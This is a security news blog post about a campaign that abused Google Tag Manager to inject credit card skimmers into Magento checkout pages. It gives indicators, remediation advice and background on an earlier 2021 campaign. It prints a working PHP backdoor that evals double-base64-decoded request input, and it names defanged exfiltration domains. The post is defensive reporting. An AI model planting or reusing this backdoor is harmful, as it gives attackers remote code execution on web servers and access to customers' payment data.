• Vulnerable U
  • Posts
  • Hackers Use Google Tag Manager to Inject Credit Card Skimmers in E-Commerce Stores

Hackers Use Google Tag Manager to Inject Credit Card Skimmers in E-Commerce Stores

Malware campaign abusing GTM to inject credit card skimmers into e-commerce sites. Obfuscated JavaScript stealing payment data, along with a hidden PHP backdoor for persistent access.

Author

Matt Johansen
February 11, 2025

A new malware campaign is abusing Google Tag Manager (GTM) to inject credit card skimmers into Magento-based e-commerce websites, security researchers at Sucuri have discovered.

At least six compromised websites were identified, with attackers using GTM to inject obfuscated JavaScript skimmers that steal credit card details directly from checkout pages.

This attack demonstrates how cybercriminals are increasingly leveraging legitimate web services to bypass security measures and exfiltrate financial data.

Hell, who remembers my BlackHat talk in 2013, Million Browser Botnet, that abused ads to inject javascript into websites? This attack would still work just as I detailed it back then.

How the GTM Attack Works

The investigation began after a customer reported unauthorized credit card transactions linked to their Magento store.

According to Sucuri's report, the malware was traced to a malicious Google Tag Manager script reference stored within Magento’s cms_block.content table.

Sucuri explained in their report that attackers used GTM as a delivery mechanism for injecting malicious JavaScript, a tactic that helps evade traditional security scans.

Technical Breakdown of the Attack

1. Malicious GTM Script Embedded in Magento Database

  • The cms_block.content table contained a seemingly normal GTM script reference: 

<script src="https://www.googletagmanager.com/gtm.js?id=GTM-MLHK2N68"></script>

  • However, deeper analysis revealed obfuscated JavaScript embedded inside the GTM container itself.

2. Obfuscated Credit Card Skimmer

  • The malicious JavaScript skimmer activates on checkout pages, capturing credit card details entered by users.

  • Data is exfiltrated to an attacker-controlled command and control (C2) domain: eurowebmonitortool[.]com

3. PHP Backdoor Discovered in Media Directory

  • Attackers also planted a PHP backdoor in media/index.php, allowing remote execution of arbitrary PHP code.

  • The backdoor leveraged base64-encoded commands, enabling attackers to maintain persistent access. 

function get_data($param, $default) { 
    $total = $_REQUEST; 
    return isset($total[$param]) ? $total[$param] : $default;
} 
function get_cli() { 
    if( strpos(hash("sha256", get_data("item", "")), "5a2c75360f3ff123") === false ) 
        return ""; 
    $data = get_data("order", ""); 
    return base64_decode(base64_decode($data)); 
} 
eval(get_cli());

  • This type of backdoor allows attackers to inject additional malware, escalate privileges, or steal even more data.

Connection to Magecart Techniques

This attack bears similarities to past Magecart campaigns, which have targeted e-commerce platforms with web-skimming malware.

In 2024, security researchers linked the Magecart actor ATMZOW to a separate GTM-based skimming operation.

While Sucuri did not directly attribute this campaign to Magecart ATMZOW, the tactic of injecting malicious scripts via GTM aligns with previous Magecart techniques.

Remediation & Security Recommendations

To mitigate this attack, Sucuri researchers removed the malicious GTM references, cleaned the database, and deleted the PHP backdoor.

They also provided the following security recommendations for site owners:

  • Audit Google Tag Manager – Log into GTM and review all active tags. Remove any unknown or suspicious scripts.

  • Perform a full website malware scan – Check for hidden scripts, injected JavaScript, and modified database entries.

  • Check Magento’s media/ directory – Look for unauthorized PHP files, as attackers frequently hide backdoors here.

  • Keep Magento & extensions updated – Ensure Magento core and all third-party extensions are running the latest security patches.

  • Monitor site traffic & GTM activity – Use security logging to track unusual script activity in checkout flows.

Expanding Context: The 2021 GTM-Based Magecart Campaign

This is not the first time Google Tag Manager has been weaponized for large-scale credit card theft. A 2021 investigation by security researchers uncovered a massive Magecart campaign that compromised 316 e-commerce sites worldwide using a nearly identical attack method.

Key Findings from the 2021 Campaign

  • Attackers abused Google Tag Manager containers to inject malicious JavaScript into checkout pages.

  • The malware campaign led to the theft of at least 88,000 payment card records, which were later posted on dark web marketplaces.

  • Magecart actors used two primary methods to execute these attacks:

    1. Embedding the credit card skimming script directly into GTM containers.

    2. Using GTM to load the skimming script from an external domain.

  • Many of the affected sites were small-to-medium-sized businesses running Magento, a historically popular target for Magecart operations due to its self-hosted nature and the security burden placed on individual site owners.

How Magecart Attackers Used GTM in 2021

Similar to the current 2025 attack uncovered by Sucuri, the 2021 campaign took advantage of Google’s trusted infrastructure:

  • JavaScript inside GTM containers executes automatically once loaded on a page.

  • Security tools often fail to flag GTM traffic since it originates from a legitimate Google service.

  • Attackers could dynamically update scripts without needing direct access to compromised websites.

A major concern raised by researchers at the time was how Google’s widespread adoption as a trusted third-party service provided attackers with built-in credibility, allowing their malicious scripts to run undetected for extended periods.

Indicators of Compromise from the 2021 Attacks

Infected e-commerce sites loaded Magecart skimmers through GTM with obfuscated JavaScript, much like the GTM-MLHK2N68 attack Sucuri identified in 2025. The malware operated by:

  1. Capturing user input on checkout pages, including credit card numbers, expiration dates, CVV codes, and billing addresses.

  2. Encoding the stolen data in Base64 and sending it to attacker-controlled exfiltration domains.

  3. Masquerading as legitimate Google services by using typosquatted or fake domains, such as:

    • googleadwordstrack[.]com

    • googletrackevent[.]com

    • googleadwordswidget[.]com

Why This Matters Now

The 2025 campaign uncovered by Sucuri follows this same GTM abuse strategy, reinforcing the fact that Magecart-style skimming attacks are evolving, not disappearing.

The shift from on-site injection (modifying JavaScript files) to leveraging GTM and other trusted services makes these attacks harder to detect.

Lessons Learned & Long-Term Defenses

Magecart actors have been exploiting Google services, third-party scripts, and misconfigured web security for years. This 2025 GTM attack and the 2021 campaign both highlight:

  1. The importance of monitoring GTM and third-party integrations.

  2. The need for strict Content Security Policies (CSPs) to limit script execution.

  3. Why regular site audits are necessary, especially for Magento store owners.

  4. The growing trend of attackers using legitimate services to evade detection.

Given the similarities between this attack and previous Magecart operations, businesses should assume this tactic will persist and ensure continuous monitoring of their GTM and security configurations.

In case you wanted to follow up on my BlackHat talk I mentioned above, here it is. We bought an ad, got it approved, then swapped the JavaScript out in it to DDoS our targets. For less than $100 we generated some serious pain.